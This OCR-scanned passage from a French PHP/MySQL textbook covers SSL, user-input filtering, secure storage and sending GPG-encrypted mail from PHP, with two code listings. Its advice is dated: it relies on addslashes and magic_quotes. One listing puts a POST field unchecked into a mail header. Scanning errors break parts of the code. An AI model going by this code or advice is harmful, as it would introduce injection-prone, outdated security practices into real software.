moins que le navigateur n'ait fourni un certificat numerique en reponse a la 
requete du serveur, auquel cas le serveur utilise la cle publique du navigateur). 

c. Les cles de chiffrement pour cette session sont produites a partir de ces donnees 
aleatoires, a l'aide des fonctions de hachage. 

La generation de nombres aleatoires de bonne qualite, le dechiffrage des certificats 
numeriques et la production des cles en utilisant un systeme de chiffrement par cle 
publique prennent du temps, c'est pourquoi cette sequence d'echange est un peu 
longue. Heureusement, les resultats sont mis en cache, ce qui permet au meme naviga- 
teur et au meme serveur d'echanger plusieurs messages securises en n'effectuant 
qu'une seule fois cette sequence. 

L envoi de donnees sur une connexion SSL passe par les etapes suivantes : 

1. Les donnees sont decomposers en paquets. 

2. Chaque paquet est (eventuellement) compresse. 

3. Un code d' authentication de message (MAC) est calcule pour chaque paquet, avec 
un algorithme de hachage. 

4. Le MAC et les donnees compressees sont combines et chiffres. 

5. Les paquets chiffres sont combines avec des informations d'en-tete et envoy es sur le 
reseau. 

L ensemble de ce processus est decrit a la Figure 16.4. 

Dans ce diagramme, vous remarquerez que l'en-tete TCP est ajoute apres le chiffrement 
des donnees. Cela signifie que les informations de routage peuvent toujours etre inter- 
ceptees et, bien que d'eventuelles personnes indiscretes ne puissent pas intercepter les 
donnees echangees, elles peuvent savoir qui les echange. 

SSL compresse les donnees avant le chiffrement car, bien que la plupart du trafic 
reseau puisse etre (et est souvent) compresse avant d'etre transmis sur un reseau, les 
donnees chiffrees ne sont generalement pas bien compressees. Les systemes de 
compression fonctionnent en cherchant des similitudes dans les donnees a compresser. 
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Figure 16.4 

SSL decompose, compresse, hache et chiffre les donnees avant de les envoyer. 



Lorsqu'on tente de compresser une suite de caracteres qui est devenue aleatoire apres 
avoir ete chiffree, on ne peut pas compresser les donnees de maniere efficace. II serait 
dommage que SSL, qui a ete concu pour ameliorer la securite reseau, ait pour effet de 
ralentir le trafic reseau. 

Bien que SSL soit relativement complexe, les utilisateurs et les developpeurs sont 
proteges de la plupart des problemes qui peuvent se poser, puisque les interfaces de 
SSL reproduisent fidelement celles des protocoles existants. 

TLS (Transport Layer Security), actuellement dans sa version 1.1, repose directement 
sur SSL 3.0, mais il contient des ameliorations destinees a combler certaines faiblesses 
de SSL et offre une flexibilite accrue. 



Filtrer les donnees saisies 

L'un des principes pour la mise en ceuvre d'une application web securisee consiste a 
filtrer toutes les donnees saisies par les utilisateurs. II faut toujours les analyser avec 
precaution avant de les enregistrer dans un fichier ou dans une base de donnees ou avant 
de les passer a une commande systeme. 
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Nous avons deja mentionne dans ce livre plusieurs techniques permettant de filtrer les 
donnees des utilisateurs. Nous allons les recapituler, a titre de reference : 

La fonction addslashes ( ) sert a filtrer les donnees avant de les passer a une base de 
donnees. Cette fonction supprime les caracteres susceptibles de poser probleme 
dans la base. La fonction stripslashes ( ) permet de retablir une chaine filtree dans 
son etat initial. 

■ Vous pouvez activer les directives magic quotes gpc et magic quotes runtime 
dans votre fichier php.ini. Ces directives ajoutent et suppriment automatiquement 
les barres obliques a votre place. La directive magic quotes gpc applique ce forma- 
tage aux requetes GET et POST en entree et aux variables des cookies, tandis que la 
directive magic quote runtime l'applique aux donnees qui entrent ou qui sortent 
des bases de donnees. 

La fonction escapeshellcmd ( ) peut etre utilisee lorsque vous passez des donnees 
saisies par les utilisateurs a un appel system() ou exec(), ou entre des backticks 
(apostrophes inverses). Elle supprime tous les meta-caracteres qui pourraient forcer 
votre systeme a executer des commandes arbitraires entrees par un utilisateur 
malveillant. 

■ Vous pouvez vous servir de la fonction strip tags() pour supprimer les balises 
HTML et PHP dans une chaine. Cela empeche les utilisateurs malveillants d'inserer 
des scripts dans des donnees utilisateur susceptibles d'etre renvoyees au navigateur. 

La fonction htmlspecialchars( ) convertit les caracteres en entites HTML. Par 
exemple, < est converti en <. Cette fonction transforme toutes les balises de 
scripts en caracteres inoffensifs. 

Stockage securise 

Les trois sortes de donnees qui peuvent etre enregistrees (c'est-a-dire les fichiers PHP 
ou HTML, les donnees des scripts et les donnees MySQL) sont souvent conservees 
dans differents emplacements d'un meme disque bien qu'elles soient representees sepa- 
rement (voir Figure 16.1). Chaque type de stockage necessite diverses precautions que 
nous allons maintenant etudier en detail. 

Les donnees les plus dangereuses sont sans conteste les fichiers executables. Sur un site 
web, il s'agit generalement de scripts. II faut prendre garde a definir correctement les 
droits d'acces dans votre arborescence web, c'est-a-dire celle qui commence au reper- 
toire htdocs sur un serveur Apache ou au repertoire inetpub sur un serveur IIS. Les utili- 
sateurs doivent pouvoir lire vos scripts afin d'en afficher le resultat, mais ils ne doivent 
pas pouvoir les modifier. 
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Cette regie est egalement valable pour les repertoires situes dans 1' arborescence web. 
Vous seul devez etre capable de modifier ces repertoires. Les autres utilisateurs, y 
compris l'utilisateur sous le compte duquel le serveur s'execute, ne doivent pas pouvoir 
modifier ou creer de nouveaux fichiers dans des repertoires susceptibles d'etre charges 
par le serveur web. Si vous permettez a ces utilisateurs d'ecrire des fichiers dans ces 
repertoires, ils pourraient y deposer un script malicieux et l'executer a l'aide du serveur. 

Si vos scripts ont besoin de droits d'acces en ecriture sur certains fichiers, creez un 
repertoire special en dehors de 1' arborescence web. Cette regie est particulierement 
valable pour les scripts de depots de fichiers. II ne faut jamais melanger les scripts et les 
donnees qu'ils ecrivent. 

Lorsque vous ecrivez des donnees sensibles, vous pouvez choisir de les chiffrer, bien 
que cela n'apporte pas forcement une securite accrue. En effet, si votre serveur web 
contient un fichier appele numeros_cartes_de_credit.txt et qu'un pirate arrive a s'intro- 
duire dans votre serveur et a lire ce fichier, il est fort possible qu'il arrive egalement a 
lire les autres fichiers de votre serveur. Pour chiffrer et dechiffrer les donnees, vous avez 
besoin d'un programme permettant de les chiffrer, d'un autre pour les dechiffrer et de 
un ou plusieurs fichiers contenant des cles. Si le pirate peut lire vos donnees, il peut 
probablement acceder aussi a ces fichiers. 

Le chiffrement des donnees peut etre interessant sur un serveur web uniquement si les 
logiciels et les cles de chiffrement se trouvent non pas sur le serveur lui-meme, mais sur 
un autre ordinateur. Vous pouvez par exemple chiffrer vos donnees sur le serveur, puis 
les transmettre a un autre ordinateur, eventuellement par e-mail. 

Les informations contenues dans les bases de donnees sont comparables a des fichiers 
de donnees. Si vous configurez MySQL correctement, seul MySQL peut ecrire dans ses 
propres fichiers de donnees. Cela signifie qu'il ne vous reste plus qu'a vous occuper des 
acces des utilisateurs a MySQL. Nous avons deja presente le systeme des permissions 
de MySQL, lequel affecte des droits d'acces a chaque utilisateur et a chaque hote. 

II convient cependant d'observer que vous devrez souvent ecrire un mot de passe 
MySQL dans un script PHP. Vos scripts PHP sont en general accessibles a tout le 
monde. En fait, cela ne pose pas vraiment de probleme : a moins que la configuration de 
votre serveur web ne soit compromise, votre code PHP n'est pas accessible depuis 
l'exterieur. 

Si votre serveur est configure pour analyser les fichiers .php avec l'interpreteur PHP, 
les personnes exterieures ne pourront pas recuperer le code source non interprete. 
Cependant, il faut faire attention lorsque vous utilisez d' autres extensions. Si vous 
placez des fichiers .inc dans vos repertoires web, n'importe quelle personne qui les 
demande recevra leur code source. II faut done placer les fichiers a inclure en dehors 
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de 1' arborescence web ou configurer votre serveur pour qu'il n'envoie pas les fichiers 
possedant cette extension, ou leur donner l'extension .php. 

Si vous partagez un serveur web avec d'autres personnes, votre mot de passe MySQL 
peut etre accessible aux utilisateurs de cet ordinateur, qui peuvent egalement executer 
des scripts avec le meme serveur. En fonction de la configuration de votre systeme, 
cette situation peut etre inevitable. Pour resoudre ce probleme, vous pouvez configurer 
le serveur web pour qu'il execute ses scripts sous le nom d'utilisateurs particuliers ou 
en obligeant chaque utilisateur a executer sa propre instance du serveur web. Si vous 
n'etes pas l'administrateur de votre serveur web (ce qui est fort probable si vous le 
partagez), il peut etre interessant de parler de ce probleme avec votre administrateur et 
de passer en revue les differentes options de securite. 

Stockage des numeros de cartes de credit 

Maintenant que nous avons parle de l'enregistrement des donnees sensibles, nous 
pouvons nous interesser a un type de donnees qui merite une etude particuliere. Les 
internautes etant tres mefiants des qu'il s'agit de fournir leur numero de carte de credit, 
vous devez done etre tres prudent si vous les stockez. II faut egalement vous demander 
pourquoi vous les stockez et si e'est reellement necessaire. 

Qu'allez-vous faire avec un numero de carte de credit ? Si vous traitez vos transactions 
une par une et si vous disposez d'un systeme de traitement en temps reel de ces nume- 
ros, il vaut mieux les demander a vos utilisateurs et les envoyer directement a votre 
passerelle de traitement des transactions, sans les enregistrer. 

En revanche, si vous devez debiter regulierement plusieurs cartes, par exemple dans le 
cadre d'un abonnement, il ne s'agit pas d'une bonne methode. Dans ce cas, il faut 
penser a stacker ces numeros ailleurs que sur le serveur web. 

Si vous avez l'intention de stacker un grand nombre de numeros de cartes de credit, 
assurez-vous que votre administrateur systeme est suffisamment doue et assez para- 
noiaque pour verifier regulierement les dernieres mises a jour de securite pour le 
systeme d' exploitation et les logiciels utilises. 

Utilisation du chiffrement avec PHP 

A titre d' exemple, nous allons voir comment envoyer un e-mail chiffre. Depuis 
plusieurs annees, le standard de facto pour les e-mails chiffre est PGP (Pretty Good 
Privacy). Philip R. Zimmermann a ecrit PGP specialement pour permettre la confiden- 
tialite des e-mails. 
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S'il existe des versions gratuites de PGP, il faut savoir qu'il ne s'agit pas d'un logiciel 
libre. La version gratuite ne peut etre utilisee legalement que dans le cadre d'une utili- 
sation non commerciale. 

II existe egalement une version open-source de PGP, GPG (Gnu Privacy Guard), qui 
offre une alternative libre et gratuite a PGP Cette version ne contient aucun algorithme 
depose et peut etre utilisee sans aucune restriction dans un cadre commercial. 

Ces deux produits effectuent la meme tache, presque de la meme maniere. Si vous avez 
l'intention d'utiliser ces outils a partir de la ligne de commande, vous ne verrez pas 
grande difference entre les deux, mais chacun fournit des interfaces differentes se 
presentant, par exemple, sous la forme de modules destines a des programmes de courrier 
electronique afm de dechiffrer automatiquement les e-mails lors de leur reception. 

GPG est disponible sur le site http://www.gnupg.org. 

Vous pouvez egalement utiliser ces deux produits conjointement ; il est ainsi possible 
de chiffrer avec GPG des messages destines a une personne employant PGP pour les 
dechiffrer (a condition qu'elle en possede une version recente). Comme nous nous inte- 
ressons a la creation de messages au niveau du serveur web, notre exemple se servira de 
GPG. L' utilisation de PGP a la place de GPG ne change pas grand-chose au processus. 

Outre les prerequis habituels pour les exemples de ce livre, vous devrez avoir installe 
GPG pour que ce code fonctionne. II est d'ailleurs peut-etre deja installe sur votre 
systeme. Si ce n'est pas le cas, ne vous inquietez pas : la procedure d' installation est 
tres simple, bien que la configuration ulterieure soit assez delicate. 

Installation de GPG 

Pour ajouter GPG sur notre ordinateur Linux, nous avons charge le fichier archive appro- 
prie depuis le site www.gnupg.org. Selon que vous choisissez le format d' archive Jar.gz 
ou Jar.bz2, vous aurez besoin de gunzip ou de bunzip2 et de tar pour extraire les fichiers 
de 1' archive. 

Pour compiler et installer le programme, servez-vous des commandes traditionnelles : 

configure (ou ./configure selon votre systeme) 
make 

make install 

Si vous n'etes pas l'utilisateur root, vous devrez executer le script de configuration 
avec 1' option prefix, comme ceci : 

. /configure --pref ix=/chemin/vers/votre/repertoire 

En effet, seul root a acces au repertoire par defaut de GPG. 



408 Partie III 



Securite 



Si tout se passe bien, GPG est compile et 1' executable est copie dans le repertoire /usr/ 
local/bin/ 'gpg ou dans celui precise lors de 1' installation. Vous pouvez modifier 
plusieurs options. Consultez la documentation de GPG pour plus de details. 

Pour un serveur Windows, le processus d' installation est encore plus simple. Chargez le 
fichier zip, decompressez-le et placez gpg.exe dans un des repertoires indiques dans 
votre variable PATH (C:\Windows\ par exemple). Creez le repertoire C:\gnupg, ouvrez 
un interpreteur de commandes et saisissez la commande gpg. 

Vous devez egalement installer GPG ou PGP (et generer une paire de cles correspon- 
dante) sur le systeme sur lequel vous irez chercher vos e-mails. 

Sur le serveur web, il existe tres peu de differences entre les versions en ligne de 
commande de GPG et de PGP, done, autant utiliser GPG, d'autant plus qu'il est gratuit. 
Sur l'ordinateur a partir duquel vous lisez vos e-mails, vous pouvez preferer installer 
une version commerciale de PGP, pour tirer profit de son interface utilisateur graphique 
qui s'integre dans votre logiciel de courrier. 

Si vous n'en possedez pas deja une, produisez une paire de cles sur l'ordinateur dont 
vous vous servez pour lire vos courriers. Une paire de cles est composee d'une cle 
publique que les autres personnes (et vos scripts PHP) utilisent pour chiffrer les cour- 
riers avant de vous les envoy er et d'une cle privee dont vous devez vous servir pour 
dechiffrer les messages que vous recevez et pour signer les courriers sortants. 

II est important que la generation des cles soit effectuee sur l'ordinateur choisi pour la 
lecture des courriers et non pas sur le serveur web, puisque votre cle privee ne doit pas 
etre conservee sur le serveur web. 

Si vous vous servez de la version en ligne de commande de GPG pour generer vos cles, 
saisissez la commande suivante : 

gpg --gen-key 

Vous devrez repondre a certaines questions. La plupart d'entre elles sont accompagnees 
d'une reponse par defaut que vous pouvez accepter. Vous devrez notamment fournir un 
nom, une adresse e-mail et un commentaire qui seront utilises pour donner un nom a la 
cle. Par exemple, ma cle s'appelle 'Luke Welling <luke@tangledweb . com . au> ' . Si 
nous voulions fournir un commentaire, celui-ci serait insere entre le nom et 1' adresse. 

Pour exporter la cle publique de votre nouvelle paire de cles, vous pouvez vous servir 
de la commande suivante : 

gpg --export > nomdefichier 

Cette commande produit un fichier binaire destine a etre importe dans le systeme de 
cles de PGP ou de GPG d'un autre ordinateur. Si vous souhaitez transmettre cette cle 
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par courrier a d'autres personnes, afin qu'ils puissent l'importer dans leur systeme de 
cles, il vaut mieux creer une version ASCII de ce fichier : 

gpg --export -a > nomde fichier 

Apres avoir extrait la cle publique, vous pouvez transferer le fichier dans votre compte 
sur le serveur web, a l'aide de FTP. 

Les commandes suivantes supposent que vous utilisez Unix. Les etapes sont les memes 
sous Windows, mais les noms des repertoires et ceux des commandes sont differents. 

Ouvrez une session sur le serveur web, sous votre compte, et modifiez les droits du 
fichier pour que les autres personnes puissent le lire : 

chmod 644 nomdefichier 

Vous devez creer un trousseau de cles pour que l'utilisateur au nom duquel vos scripts 
PHP sont executes puisse se servir de GPG. Le nom de cet utilisateur depend de la 
configuration de votre serveur. II s'agit souvent de l'utilisateur ' nobody ' . 

Ouvrez une session sous le compte de l'utilisateur du serveur web. Pour cela, vous 
devez posseder un acces root au serveur. Sur la plupart des systemes, le serveur web 
s'execute sous le compte nobody. Les exemples suivants partent de cette hypothese. Si 
c'est bien le cas sur votre systeme, saisissez la commande suivante : 

su root 
su nobody 

Creez un repertoire pour nobody, destine a contenir son trousseau de cles et les autres 
informations de configuration de GPG. Ce repertoire doit se trouver dans le repertoire 
personnel de nobody. 

Le repertoire personnel de chaque utilisateur est specific dans le fichier /etc/passwd. 
Sur la plupart des systemes Linux, le repertoire personnel de nobody vaut par defaut /, 
et nobody n'a aucun droit en denture sur ce repertoire. Sur la plupart des systemes BSD, 
le repertoire personnel de nobody est par defaut /nonexistent, dans lequel on ne peut 
pas ecrire puisqu'il n'existe pas. Sur notre systeme, le repertoire personnel de nobody 
est /tmp. Vous devez vous assurer que l'utilisateur de votre serveur web possede un 
repertoire personnel dans lequel il peut ecrire. 

Saisissez les commandes suivantes : 
cd - 

mkdir .gnupg 

L'utilisateur nobody doit posseder sa propre cle de signature. Pour la creer, executez a 
nouveau la commande suivante : 

gpg --gen-key 
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Comme votre utilisateur nobody recoit probablement tres peu de courriers personnels, 
vous pouvez lui creer une cle de signature qui lui est propre. Le seul interet de cette 
cle est de nous permettre de faire confiance a la cle publique qui a ete extraite prece- 
demment. 

Pour importer la cle publique que nous avons exportee auparavant, servez-vous de la 
commande suivante : 

gpg --import nom_fichier 

Pour indiquer a GPG que nous souhaitons faire confiance a cette cle, nous devons modifier 
les proprietes de cette cle avec la commande suivante : 

gpg --edit-key 'Luke Welling <luke@tangledweb. com.au>' 

Sur cette ligne, le texte entre guillemets correspond au nom de la cle. Naturellement, le 
nom de votre cle sera non pas 'Luke Welling <luke@tangledweb. com.au>', mais une 
combinaison du nom, du commentaire et de l'adresse de courrier que vous avez fournis 
lors de sa creation. 

Parmi les options de ce programme, vous pouvez utiliser help, qui decrit les commandes 
disponibles : trust, sign et save. 

Tapez trust pour indiquer a GPG que vous faites entierement confiance a la cle. Choi- 
sissez sign pour signer cette cle publique a l'aide de la cle privee de nobody. Enfin, 
saisissez save pour sortir de ce programme en enregistrant vos modifications. 

Tester GPG 

GPG devrait maintenant etre configure et pret a l'emploi. 

Pour le tester, nous pouvons creer un fichier texte et l'enregistrer sous le nom test . txt. 
Saisissez la commande suivante (a adapter en fonction du nom de votre cle) : 

gpg -a --recipient 'Luke Welling <luke@tangledweb. com.au>' --encrypt test. txt 
et vous devriez obtenir l'avertissement suivant : 

gpg: Warning: using insecure memory! 

En outre, un fichier appele test. txt. asc devrait etre cree. Si vous ouvrez 
test . txt . asc, vous devriez voir un message crypte ressemblant a ceci : 

BEGIN PGP MESSAGE 

Version: GnuPG vl.0.3 (GNU/Linux) 
Comment: For info see http://www.gnupg.org 

hQEOA0DU7hVGgdtnEAQAhr4HgR7xpIBsK9CiELQw85+k1QdQ+p/FzqL8tICrQ+B3 
0GJTEehPUDErwqUw/uQLTds0r1oPSrIAZ7c6GVkh0YEVBj2MskT81IIBvdo95OyH 
K9PUCvg/rLxJ1kxe4Vp8QFET5E3FdII/ly8VP5gSTE7gAgm0SbFf3S91PqwMyTkD 
/2oJEvL6e3cP384s0i8lrBbDbOUAAhCijXt2DX/uX9q6P18QW56UICUOn4DPaW1G 
/gnNZCkcVDgLcKfBjbkB/TCWWhpA7o7kX4CIcIh7KlIMHY4RKdnCWQf271oE+8i9 
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cJRSCMsFIoI6MMNRCQHY6p9bfxL2uE39IRJrQbe6xoEe0nkB0uTYxiL0TG+FrNrE 

tvBVMS0nsHu7HJey+oY4Z833pk5+MeVwYumJwlvHjdZxZmV6wz46GO2XGT17b28V 

wSBnWOoBHSZsPvkQXHTOq65EixP8y+YJvBN3z4pzdH0Xa+NpqbH7q3+xXmd30hDR 

+u7t6MxTLDbgC+NR 

=gfQu 

END PGP MESSAGE 

Vous devriez etre capable de transferer ce fichier sur le systeme ou vous avez genera 
initialement la cle. Executez ensuite la commande suivante : 

gpg test.txt.asc 

pour retrouver votre message d'origine. Le texte sera ecrit dans un fichier portant le 
meme nom qu'auparavant (dans le cas present, test .txt). 

Pour que le texte soit affiche a l'ecran, utilisez 1' option d : 
gpg -d test.txt.asc 

Pour placer le texte dans un fichier de votre choix au lieu du nom par defaut, vous 
pouvez egalement utiliser l'option o et preciser un fichier de sortie, comme ceci : 

gpg -do test. out test.txt.asc 

Notez que le fichier de sortie est nomme en premier. 

Si vous avez configure GPG pour que l'utilisateur au nom duquel vos scripts PHP sont 
executes puisse s'en servir a partir de la ligne de commande, vous avez presque 
termine. Si cela ne fonctionne pas, consultez votre administrateur systeme ou la docu- 
mentation de GPG. 

Les Listings 16.1 et 16.2 permettent d'envoyer des courriers chiffres en utilisant PHP 
pour appeler GPG. 

Listing 16.1 : mail jprive.php — Notre formulaire HTML pour envoyer des courriers chiffres 



<html> 
<body> 

<h1 >Envoyez-moi un courrier prive</h1> 
<?php 

// Vous pouvez modifier cette ligne si vous n' utilisez pas les ports par 
// defaut : 80 pour un trafic normal et 443 pour SSL. 
if ($_SERVER[ ' SERVER_PORT ' ] !=443) { 
echo "<p style=\ "color: red\ ">ATTENTION : vous n'etes pas connecte 
a cette page par SSL. Votre message pourrait etre lu par 
d ' autres . </p>" ; 

} 

?> 

<form method="post" action="envoi_mail_prive.php"> 

<p>Votre adresse de courrier :<br/> 

<input type="text" name="expediteur" size="40" /></p> 
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<p>Objet :<br/> 

<input type="text" name="titre" size="40"/></p> 
<p>Votre message:<br/> 

<textarea name="corps" cols="30" rows="10"></textarea></p> 
<br/> 

<input type="submit" name="submit" value="Envoyer ! "/> 

</f orm> 

</body> 
</html> 



Listing 16.2 : envoi_mail _prive.php — Script PHP pour appeler GPG et envoyer 
des e-mails chiffres 



<?php 

// Creation de variables au nom court 
$expediteur = $_P0ST[ ' expediteur ' ] ; 
$titre = $_P0ST[ 'titre' ] ; 
$corps = $_P0ST[ 'corps' ] ; 

$destinataire = ' luke@localhost ' ; 

// Indique a gpg ou trouver le trousseau de cles 

// Sur ce systeme, le repertoire personnel de nobody est /tmp 

putenv( ' GNUPGHOME=/tmp/ .gnupg ' ) ; 

// Creation d'un nom de fichier unique 
$fichier_in = tempnam( ' ' , ' pgp ' ) ; 
$fichier_out = $f ichier_in . ' . asc ' ; 

// Ecriture du texte de 1 ' utilisateur dans le fichier 
$desc = fopen($fichier_in, 'w'); 
fwrite($desc, $corps); 
fclose($desc) ; 

// Configuration de la commande 

$commande = "/usr/local/bin/gpg -a \\ 

--recipient 'Luke Welling <luke@tangledweb. com.au>' \\ 
--encrypt -o $fichier_out $f ichier_in " ; 

// Execution de la commande 
system($commande, $resultat); 

// Suppression du fichier non chiffre 
unlink($f ichier_in) ; 

if($resultat == 0) { 

$desc = fopen($fichier_out , 'r'); 

if((!$desc) || (filesize($fichier_out) == 0)) { 

$resultat = -1 ; 
} else { 

// Lecture du fichier chiffre 
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$contenu = fread ($desc, filesize ($f ichier_out) ) ; 

// Suppression du fichier chiffre 
unlink($f ichier_out) ; 



mail($destinataire, $titre, $contenu, "From: " . $expediteur . " \n " ) ; 
echo ' <h1 >Message envoye</h1> 

<p>Votre message a ete chiffre et envoye.</p> 

<p>Merci.</p>' ; 

} 

} 

if($resultat != 0) { 
echo "<h1>Erreur :</h1> 

<p>Votre message n'a pas pu etre chiffre. </p> 
<p>Il n'a pas ete envoye.</p> 
<p>Desole.</p>" ; 

} 

?> 



Pour que ce programme fonctionne chez vous, vous devrez modifier quelques elements. 
Les e-mails seront envoyes a l'adresse indiquee dans $destinataire. 

La ligne : 

putenv( ' GNUPGHOME=/tmp/ . gnupg ' ) ; 

doit etre modifiee en fonction de l'emplacement de votre trousseau de cles GPG. Sur 
notre systeme, le serveur web est execute sous le compte de l'utilisateur nobody, dont le 
repertoire par defaut est /tmp. 

Nous nous servons de la fonction tempnam( ) pour creer un nom de fichier temporaire 
unique. Vous pouvez preciser a la fois son repertoire et le prefixe du nom du fichier. 
Comme nous allons creer et supprimer ces fichiers en l'espace de quelques secondes, 
leur nom n'est pas vraiment important. Nous avons choisi pgp comme prefixe, en laissant 
PHP se servir du repertoire temporaire du systeme. 

L' instruction : 

$commande = " /usr/local/bin/gpg -a \\ 

--recipient 'Luke Welling <luke@tangledweb. com.au>' \\ 
--encrypt -o $fichier_out $f ichier_in " ; 

definit la commande et les parametres qui seront utilises pour invoquer gpg. Elle doit 
done etre modinee en fonction de vos parametres. Comme nous 1' avons vu lorsque nous 
1' avons invoque a partir de la ligne de commande, nous devons indiquer a GPG la cle a 
utiliser pour chiffrer le message. 

L' instruction : 



system($commande, $resultat); 
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execute les instructions conservees dans $commande et enregistre la valeur renvoyee 
dans $resultat. 

II est tout a fait possible d'ignorer la valeur de retour, mais elle permet d'afficher un 
message d'erreur en cas de probleme. 

Lorsque nous n' avons plus besoin des fichiers temporaires, nous pouvons les supprimer 
avec la fonction unlink(). Cela signifie que 1' e-mail dechiffre de notre utilisateur ne 
reste sur le serveur que pendant un temps tres bref. Cela dit, si le serveur plante en cours 
de traitement, il est possible que ce fichier reste sur le disque. 

Puisque nous nous interessons a la securite de notre script, il est important de conside- 
rer tous les flux d' informations a l'interieur de notre systeme. GPG chiffre notre e-mail 
et permet au destinataire de le dechiffrer, mais comment le message est-il envoye a 
l'origine ? Si vous fournissez une interface web pour envoy er des e-mails chiffres avec 
GPG, le flux d' informations ressemblera a celui de la Figure 16.5. 
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Figure 16.5 

Dans I'application d'e-mails chiffres, le message est envoye trois fois sur Internet. 

Dans cette figure, chaque fleche represente votre message envoye d'un ordinateur a un 
autre. A chaque fois que le message est envoye, il passe sur Internet et peut transiter sur 
plusieurs reseaux et ordinateurs intermediaires. 

Le script qui nous interesse se trouve sur la machine webserver de cette figure. Le 
message est chiffre sur cette machine a l'aide de la cle publique du destinataire. II est 
ensuite envoye par SMTP au serveur de courrier du destinataire. Celui-ci peut alors se 
connecter a son serveur de courrier, probablement avec POP ou IMAP, et telecharger le 
message avec un lecteur de courrier. Le message est ensuite dechiffre avec sa cle privee. 

Les transferts de donnees de la Figure 16.5 sont numerates 1, 2 et 3. Dans les transferts 
2 et 3, les informations transmises correspondent au message GPG chiffre et sont 
depourvues de toute signification pour quiconque ne possede pas la cle privee. Pour le 
transfert 1 , le message transmis correspond au texte saisi dans le formulaire. 

Si nos informations sont suffisamment importantes pour etre chiffrees lors des trans- 
ferts 2 et 3, il est dommage de ne pas les chiffrer egalement pour le premier transfert. 
C'est la raison pour laquelle ce script se trouve sur un serveur qui utilise SSL. 
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Si vous tentez de vous connecter a ce script sans SSL, il repondra par un message 
d'avertissement. Pour le verifier, on teste la valeur de $ SERVER [ 'SERVER PORT' ]. Les 
connexions SSL entrent sur le 443. Toute autre connexion provoquera une erreur. 

Au lieu d'envoyer un message d'erreur, nous pouvons gerer cette situation de plusieurs 
autres manieres. Nous pouvons par exemple rediriger l'utilisateur vers la meme URL 
via une connexion SSL. Nous pouvons egalement choisir de l'ignorer, puisqu'il n'est 
generalement pas important que le formulaire ait ete envoye par une connexion securi- 
see. Le plus important est, en fait, que les informations saisies par l'utilisateur dans le 
formulaire soient envoyees de maniere securisee. Vous auriez pu vous contenter de 
fournir une URL complete comme action du formulaire. 

Pour l' instant, la balise de formulaire ressemble a ceci : 

<form method ="post" action ="envoi_mail_prive.php"> 

Nous pouvons la modifier pour envoyer les donnees via SSL, meme si l'utilisateur s'est 
connecte sans SSL, comme ceci : 

<form method ="post" action ="https: / /webserver/envoi_mail_prive . php"> 

Si vous codez en dur l'URL complete de cette maniere, vous serez sur que les donnees 
des visiteurs sont envoyees via SSL, mais vous devrez modifier le code a chaque fois 
que vous l'utiliserez sur un autre serveur ou meme dans un autre repertoire. 

Bien que dans ce cas (et dans bien d' autres) le fait que le formulaire vide soit envoye via 
SSL n'ait pas grande importance, il vaut mieux le faire. En effet, l'icone du verrou affi- 
chee en bas des navigateurs rassure les utilisateurs puisqu'il indique que leurs donnees 
seront envoyees de maniere securisee. En principe, ils ne doivent pas avoir besoin 
d'examiner votre source HTML pour verifier l'attribut d'action du formulaire. 

Pour aller plus loin 

La specification de la version 3.0 de SSL est disponible sur le site de Netscape, http:// 
wp.netscape.com/eng/ssI3/. 

Si vous souhaitez en savoir plus sur le fonctionnement des reseaux et de leurs protocoles, 
lisez le livre de Andrew S. Tanenbaum, Reseaux, paru aux editions Pearson Education 
France. 

Pour la suite 

Ce chapitre termine notre etude du commerce electronique et des problemes de secu- 
rite. Dans la prochaine partie du livre, nous nous interesserons a quelques techniques 
avancees de PHP, comme 1' interaction avec d' autres ordinateurs connectes a Internet, la 
production d'images a la volee et l'utilisation du controle de sessions. 
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Au Chapitre 2, nous avons examine les moyens a notre disposition pour lire et ecrire 
des donnees dans des fichiers stockes sur le serveur web. Dans ce chapitre, nous etudie- 
rons d'autres fonctions PHP permettant d'interagir avec le systeme de fichiers du 
serveur. 

Nous illustrerons l'etude de ces fonctions par un exemple : un site permettant a ses 
visiteurs de mettre a jour son contenu pour, par exemple, actualiser les informations 
concernant leur entreprise (ou pour disposer, pour vous-meme, d'une interface plus 
conviviale que FTP ou SCP). Une possibilite consiste a autoriser les clients a deposer 
des fichiers au format texte. Ces fichiers pourront ensuite etre consultes via un 
modele congu et elabore en PHP, a la maniere du modele de page web decrit au 
Chapitre 6. 

Avant de nous lancer dans l'etude des fonctions de manipulation du systeme de fichiers, 
nous allons brievement nous arreter sur le processus du depot de fichiers sur un serveur. 

Introduction au depot de fichiers 

La prise en charge des depots de fichiers est une fonctionnalite de PHP tres appreciable. 
Au lieu que les fichiers aillent du serveur vers le navigateur en utilisant le protocole 
HTTP, ils vont dans le sens oppose ; autrement dit, les fichiers sont envoyes par le navi- 
gateur vers le serveur. Habituellement, cette operation est implementee avec une inter- 
face de formulaire HTML. Celle dont nous allons nous servir dans notre exemple est 
presentee a la Figure 17.1. 
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Figure 17.1 

Le formulaire utilise pour 
le depot de fichiers sur un 
serveur contient des champs 
et des types de champs 
differents de ceux d'un 
formulaire HTML normal. 
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Administration - depot de fichiers 



Depot de nouveaux fichiers 



Fichier & deposer : 



f Parcourir... ^ ' Envoi du fierier^* 



Comme vous pouvez le constater, le formulaire contient un champ dans lequel l'utilisa- 
teur peut saisir le nom du fichier a deposer, ainsi qu'un bouton Browse {Parcourir) 
permettant de parcourir les fichiers disponibles sur sa machine. Nous verrons d'ici peu 
comment 1' implemented 

Apres avoir saisi un nom de fichier, l'utilisateur peut cliquer sur le bouton Envoi du 
fichier et le fichier sera depose sur le serveur ou l'attend un script PHP. 

Avant de plonger dans cet exemple, il faut savoir que le fichier php.ini dispose de cinq 
directives permettant de controler le comportement de PHP vis-a-vis du depot de 
fichiers. Ces directives, leur valeur par defaut et leur description sont presentees dans le 
Tableau 17.1. 

Tableau 17.1 : Configuration du depot de fichiers dans php.ini 

Directive Description Valeur 

par defaut 

file upload Indique si les depots de fichiers sont autorises On 

(On ou Off). 

upload tmp dir Repertoire ou seront temporairement stockes les NULL 

fichiers en attente de traitement. Si cette valeur 
n'est pas precisee, le systeme utilisera son 
repertoire temporaire par defaut. 

upload max filesize Taille maximale admise pour les fichiers deposes. 2M 

Si un fichier depose est de taille superieure, PHP 
cree un fichier de octet a la place. 

post max size Taille maximale des donnees POST acceptees par 8M 

PHP. Cette valeur doit etre superieure a celle de 
upload max filesize car elle represente la taille 
de toutes les donnees POST, pas simplement celle 
du fichier. 
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Code HTML d'un formulaire de depot de fichiers 

Pour implementer le depot de fichiers, il nous faut recourir a la syntaxe HTML congue 
specialement a cette fin. Le code HTML du formulaire montre a la Figure 17.1 est 
